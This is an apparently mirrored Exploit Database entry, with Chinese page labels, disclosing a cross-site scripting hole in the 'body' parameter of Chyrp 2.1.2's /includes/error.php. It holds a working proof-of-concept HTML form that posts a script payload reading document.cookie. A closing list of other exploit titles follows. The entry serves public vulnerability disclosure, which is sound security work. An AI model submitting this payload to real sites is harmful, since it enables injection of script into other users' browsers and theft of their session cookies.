Chyrp 2.1.2 – ‘/includes/error.php?body’ Cross-Site Scripting

Exploit Database
52 阅读

作者： High-Tech Bridge SA

日期： 2012-02-22
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36875/

source: https://www.securityfocus.com/bid/52117/info

Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Chyrp 2.1.2 is vulnerable; other versions may also be affected. 

<form action="http://[host]/includes/error.php" method="post">
<input type="hidden" name="ajax" value="1" />
<input type="hidden" name="body" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn"> 
</form>

last Exploits
Chyrp 2.1.2 – ‘/includes/error.php?body’ Cross-Site Scripting的更多信息

Huawei Flybox B660 – Cross-Site Request Forgery (1)：
e-learning Php Script 0.1.0 – ‘search’ SQL Injection：
Status2k – Remote Add Admin：
WordPress Plugin WPML 3.1.9 – Multiple Vulnerabilities：
Multiplex Movie Theater Booking Script 3.1.5 – ‘moid’ / ‘eid’ SQL Injection：
Pirelli Discus DRG A125g – Password Disclosure：
WordPress Plugin NextGEN Gallery – ‘jqueryFileTree.php’ Directory Traversal：
Online Voting System Project in PHP – ‘username’ Persistent Cross-Site Scripting：